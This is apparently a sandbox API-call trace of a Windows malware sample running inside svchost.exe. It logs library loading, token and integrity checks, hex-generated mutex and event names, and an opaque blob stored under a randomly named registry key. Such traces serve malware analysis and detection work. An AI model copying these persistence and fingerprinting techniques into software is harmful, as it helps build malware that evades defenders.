GetProcAddress (hModule=0x756e0000, lpProcName="InitiateSystemShutdownExW") returned 0x7573db3a [0215.411] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextW") returned 0x756edf14 [0215.411] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75c50000 [0215.422] GetProcAddress (hModule=0x75c50000, lpProcName="ShellExecuteW") returned 0x75c63c71 [0215.422] GetProcAddress (hModule=0x75c50000, lpProcName="ShellExecuteExW") returned 0x75c71e46 [0215.422] GetProcAddress (hModule=0x75c50000, lpProcName="SHGetFolderPathW") returned 0x75cd5708 [0215.422] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x750d0000 [0215.422] GetProcAddress (hModule=0x750d0000, lpProcName="PathFileExistsW") returned 0x750e45bf [0215.422] GetProcAddress (hModule=0x750d0000, lpProcName="PathIsURLW") returned 0x750e55bf [0215.422] GetProcAddress (hModule=0x750d0000, lpProcName="PathIsDirectoryEmptyW") returned 0x7510cd81 [0215.422] GetProcAddress (hModule=0x750d0000, lpProcName="StrCmpNIW") returned 0x750e4745 [0215.422] GetProcAddress (hModule=0x750d0000, lpProcName="PathRenameExtensionW") returned 0x7510d32a [0215.422] GetProcAddress (hModule=0x750d0000, lpProcName="StrStrIW") returned 0x750e46e9 [0215.422] GetProcAddress (hModule=0x750d0000, lpProcName="PathMatchSpecW") returned 0x750e86f7 [0215.422] GetProcAddress (hModule=0x750d0000, lpProcName="PathCombineW") returned 0x750ec39c [0215.422] GetProcAddress (hModule=0x750d0000, lpProcName="PathRemoveFileSpecW") returned 0x750e3248 [0215.422] GetProcAddress (hModule=0x750d0000, lpProcName="PathAddBackslashW") returned 0x750ec177 [0215.422] GetProcAddress (hModule=0x750d0000, lpProcName="wvnsprintfW") returned 0x7511066c [0215.423] GetProcAddress (hModule=0x750d0000, lpProcName="PathUnquoteSpacesW") returned 0x750e5331 [0215.423] GetProcAddress (hModule=0x750d0000, lpProcName="PathSkipRootW") returned 0x750ffbf5 [0215.423] GetProcAddress (hModule=0x750d0000, lpProcName="PathFindExtensionW") returned 0x750ea1b9 [0215.423] GetProcAddress (hModule=0x750d0000, lpProcName="SHDeleteValueW") returned 0x750dfcca [0215.423] GetProcAddress (hModule=0x750d0000, lpProcName="wvnsprintfA") returned 0x750fedfe [0215.423] GetProcAddress (hModule=0x750d0000, lpProcName="PathIsDirectoryW") returned 0x750dff07 [0215.423] GetProcAddress (hModule=0x750d0000, lpProcName="PathRemoveBackslashW") returned 0x750e5c62 [0215.423] GetProcAddress (hModule=0x750d0000, lpProcName="UrlUnescapeA") returned 0x750fc6fb [0215.423] GetProcAddress (hModule=0x750d0000, lpProcName="PathQuoteSpacesW") returned 0x7510ce21 [0215.423] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x74eb0000 [0215.423] GetProcAddress (hModule=0x74eb0000, lpProcName="GetModuleFileNameExW") returned 0x74eb13f0 [0215.424] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75450000 [0215.425] GetProcAddress (hModule=0x75450000, lpProcName="CLSIDFromString") returned 0x7546e599 [0215.425] GetProcAddress (hModule=0x75450000, lpProcName="CoInitializeEx") returned 0x754909ad [0215.425] GetProcAddress (hModule=0x75450000, lpProcName="CreateStreamOnHGlobal") returned 0x7547363b [0215.425] GetProcAddress (hModule=0x75450000, lpProcName="CoSetProxyBlanket") returned 0x75465ea5 [0215.425] GetProcAddress (hModule=0x75450000, lpProcName="CoCreateInstance") returned 0x75499d0b [0215.425] GetProcAddress (hModule=0x75450000, lpProcName="CoUninitialize") returned 0x754986d3 [0215.425] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75130000 [0215.425] GetProcAddress (hModule=0x75130000, lpProcName="DeleteObject") returned 0x75145689 [0215.425] GetProcAddress (hModule=0x75130000, lpProcName="GetDeviceCaps") returned 0x75144de0 [0215.426] GetProcAddress (hModule=0x75130000, lpProcName="CreateDCW") returned 0x7514e743 [0215.426] GetProcAddress (hModule=0x75130000, lpProcName="CreateCompatibleDC") returned 0x751454f4 [0215.426] GetProcAddress (hModule=0x75130000, lpProcName="SelectObject") returned 0x75144f70 [0215.426] GetProcAddress (hModule=0x75130000, lpProcName="CreateCompatibleBitmap") returned 0x75145f49 [0215.426] GetProcAddress (hModule=0x75130000, lpProcName="BitBlt") returned 0x75145ea6 [0215.426] GetProcAddress (hModule=0x75130000, lpProcName="DeleteDC") returned 0x751458b3 [0215.426] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75350000 [0215.429] GetProcAddress (hModule=0x75350000, lpProcName="InternetConnectA") returned 0x753749e9 [0215.429] GetProcAddress (hModule=0x75350000, lpProcName="InternetReadFile") returned 0x7536b406 [0215.429] GetProcAddress (hModule=0x75350000, lpProcName="HttpQueryInfoA") returned 0x7536a33e [0215.429] GetProcAddress (hModule=0x75350000, lpProcName="InternetQueryOptionA") returned 0x75361b56 [0215.429] GetProcAddress (hModule=0x75350000, lpProcName="HttpOpenRequestA") returned 0x75374c7d [0215.429] GetProcAddress (hModule=0x75350000, lpProcName="InternetCrackUrlA") returned 0x7535d075 [0215.429] GetProcAddress (hModule=0x75350000, lpProcName="InternetSetOptionA") returned 0x753675e8 [0215.429] GetProcAddress (hModule=0x75350000, lpProcName="InternetOpenA") returned 0x7537f18e [0215.429] GetProcAddress (hModule=0x75350000, lpProcName="InternetCloseHandle") returned 0x7536ab49 [0215.430] GetProcAddress (hModule=0x75350000, lpProcName="HttpSendRequestA") returned 0x753e18f8 [0215.430] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76c40000 [0215.430] GetProcAddress (hModule=0x76c40000, lpProcName="ObtainUserAgentString") returned 0x76c71d76 [0215.430] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76b60000 [0215.430] GetProcAddress (hModule=0x76b60000, lpProcName=0x9) returned 0x76b63eae [0215.430] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x748e0000 [0215.430] GetProcAddress (hModule=0x748e0000, lpProcName="GetUserNameExW") returned 0x74dea415 [0215.431] GetCurrentProcessId () returned 0x5fc [0215.431] CryptAcquireContextW (in: phProv=0x87e5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x87e5c*=0x50e888) returned 1 [0215.441] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x784e9) returned 0x50e4a8 [0215.441] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x877f0, dwRevision=0x1 | out: pSecurityDescriptor=0x877f0) returned 1 [0215.441] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x877f0, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x877f0) returned 1 [0215.441] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0215.446] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x50a748, lpbSaclPresent=0x1af4d8, pSacl=0x1af4e0, lpbSaclDefaulted=0x1af4dc | out: lpbSaclPresent=0x1af4d8, pSacl=0x1af4e0, lpbSaclDefaulted=0x1af4dc) returned 1 [0215.446] SetSecurityDescriptorSacl (in: pSecurityDescriptor=0x877f0, bSaclPresent=1, pSacl=0x50a75c, bSaclDefaulted=0 | out: pSecurityDescriptor=0x877f0) returned 1 [0215.446] GetVersionExW (in: lpVersionInformation=0x1af3cc*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x772a3472, dwMinorVersion=0x0, dwBuildNumber=0x511820, dwPlatformId=0x0, szCSDVersion="ⴼ疠ⴼ疠") | out: lpVersionInformation=0x1af3cc*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0215.446] GetVersionExW (in: lpVersionInformation=0x1af3b8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x1af470, dwMinorVersion=0x77dfd, dwBuildNumber=0x6, dwPlatformId=0x1, szCSDVersion="Ĝ") | out: lpVersionInformation=0x1af3b8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0215.446] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x1af4e4 | out: TokenHandle=0x1af4e4*=0xe0) returned 1 [0215.446] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1af4e0 | out: TokenInformation=0x0, ReturnLength=0x1af4e0) returned 0 [0215.446] GetLastError () returned 0x7a [0215.446] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x19, TokenInformation=0x265f7d0, TokenInformationLength=0x14, ReturnLength=0x1af4e0 | out: TokenInformation=0x265f7d0, ReturnLength=0x1af4e0) returned 1 [0215.446] GetSidSubAuthorityCount (pSid=0x265f7d8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265f7d9 [0215.446] GetSidSubAuthority (pSid=0x265f7d8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265f7e0 [0215.446] CloseHandle (hObject=0xe0) returned 1 [0215.446] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x1aff5c | out: TokenHandle=0x1aff5c*=0xe0) returned 1 [0215.446] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1aff44 | out: TokenInformation=0x0, ReturnLength=0x1aff44) returned 0 [0215.446] GetLastError () returned 0x7a [0215.446] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x1, TokenInformation=0x265f7d0, TokenInformationLength=0x24, ReturnLength=0x1aff44 | out: TokenInformation=0x265f7d0, ReturnLength=0x1aff44) returned 1 [0215.446] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0xc, TokenInformation=0x877e0, TokenInformationLength=0x4, ReturnLength=0x1aff58 | out: TokenInformation=0x877e0, ReturnLength=0x1aff58) returned 1 [0215.446] CloseHandle (hObject=0xe0) returned 1 [0215.446] GetLengthSid (pSid=0x265f7d8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0215.446] GetCurrentProcess () returned 0xffffffff [0215.447] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0x1afd5c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\svchost.exe" (normalized: "c:\\windows\\syswow64\\svchost.exe")) returned 0x1f [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="20") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="BC") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="29") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="E1") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="35") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="FB") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="9B") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="01") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="28") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="51") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="87") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="E3") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="B5") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="59") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="3C") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1afca8, cchDest=3, pszFmt="%02X", arglist=0x1afc84 | out: pszDest="C8") returned 2 [0215.447] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="20BC29E135FB9B01285187E3B5593CC8") returned 0xe0 [0215.447] GetLastError () returned 0x0 [0215.447] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="AB") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="C6") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="B5") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="B7") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="74") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="FF") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="9F") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="D7") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="F5") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="4E") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="C2") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="77") returned 2 [0215.447] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="09") returned 2 [0215.448] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="8C") returned 2 [0215.448] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="64") returned 2 [0215.448] wvnsprintfW (in: pszDest=0x1af648, cchDest=3, pszFmt="%02X", arglist=0x1af624 | out: pszDest="EE") returned 2 [0215.448] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0xe4 [0215.448] WaitForSingleObject (hHandle=0xe4, dwMilliseconds=0xffffffff) returned 0x0 [0215.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1af54a, cbMultiByte=6, lpWideCharStr=0x89b20, cchWideChar=10 | out: lpWideCharStr="Acuhci") returned 6 [0215.448] PathCombineW (in: pszDest=0x89a68, pszDir="SOFTWARE\\Microsoft", pszFile="Acuhci" | out: pszDest="SOFTWARE\\Microsoft\\Acuhci") returned="SOFTWARE\\Microsoft\\Acuhci" [0215.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1af568, cbMultiByte=9, lpWideCharStr=0x89b20, cchWideChar=10 | out: lpWideCharStr="Baywkivyl") returned 9 [0215.448] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x1af568 | out: phkResult=0x1af568*=0xec) returned 0x0 [0215.448] RegQueryValueExW (in: hKey=0xec, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x1af594, lpData=0x0, lpcbData=0x1af57c*=0x0 | out: lpType=0x1af594*=0x3, lpData=0x0, lpcbData=0x1af57c*=0x6f0) returned 0x0 [0215.448] RegQueryValueExW (in: hKey=0xec, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x1af594, lpData=0x265f850, lpcbData=0x1af57c*=0x6f0 | out: lpType=0x1af594*=0x3, lpData=0x265f850*, lpcbData=0x1af57c*=0x6f0) returned 0x0 [0215.448] RegCloseKey (hKey=0xec) returned 0x0 [0215.448] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x1af57c, lpdwDisposition=0x0 | out: phkResult=0x1af57c*=0xec, lpdwDisposition=0x0) returned 0x0 [0215.449] RegSetValueExW (in: hKey=0xec, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x265f868*, cbData=0x6f0 | out: lpData=0x265f868*) returned 0x0 [0215.449] RegCloseKey (hKey=0xec) returned 0x0 [0215.449] ReleaseMutex (hMutex=0xe4) returned 1 [0215.449] CloseHandle (hObject=0xe4) returned 1 [0215.449] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x795f6, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe4 [0215.450] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x799af, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xec [0215.450] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="02") returned 2 [0215.450] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="7E") returned 2 [0215.450] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="B9") returned 2 [0215.450] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="CF") returned 2 [0215.450] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="E1") returned 2 [0215.450] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="D6") returned 2 [0215.450] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="DD") returned 2 [0215.450] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="FF") returned 2 [0215.450] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="BD") returned 2 [0215.450] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="D8") returned 2 [0215.450] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="0F") returned 2 [0215.450] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="00") returned 2 [0215.450] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="A0") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="B9") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="BE") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="FA") returned 2 [0215.451] CreateEventW (lpEventAttributes=0x877e4, bManualReset=1, bInitialState=0, lpName="027EB9CFE1D6DDFFBDD80F00A0B9BEFA") returned 0xf0 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="E4") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="15") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="06") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="9D") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="ED") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="46") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="0A") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="21") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="10") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="76") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="00") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="42") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="5E") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="14") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="F7") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="A6") returned 2 [0215.451] CreateEventW (lpEventAttributes=0x877e4, bManualReset=1, bInitialState=0, lpName="E415069DED460A21107600425E14F7A6") returned 0xf4 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="03") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="10") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="8A") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="87") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="9F") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="80") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="B8") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="F7") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="A9") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="49") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="6B") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="90") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="B4") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="7E") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="AA") returned 2 [0215.451] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="DC") returned 2 [0215.451] CreateEventW (lpEventAttributes=0x877e4, bManualReset=1, bInitialState=0, lpName="03108A879F80B8F7A9496B90B47EAADC") returned 0xf8 [0215.451] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7ffbf, lpParameter=0x265f850, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0215.452] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="6D") returned 2 [0215.452] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="67") returned 2 [0215.452] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="41") returned 2 [0215.452] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="3D") returned 2 [0215.452] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="D2") returned 2 [0215.452] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="85") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="34") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="F4") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="DC") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="B9") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="0B") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="92") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="F8") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="70") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="D8") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="AF") returned 2 [0215.453] CreateEventW (lpEventAttributes=0x877e4, bManualReset=1, bInitialState=0, lpName="6D67413DD28534F4DCB90B92F870D8AF") returned 0x100 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="C3") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="42") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="ED") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="8F") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="57") returned 2 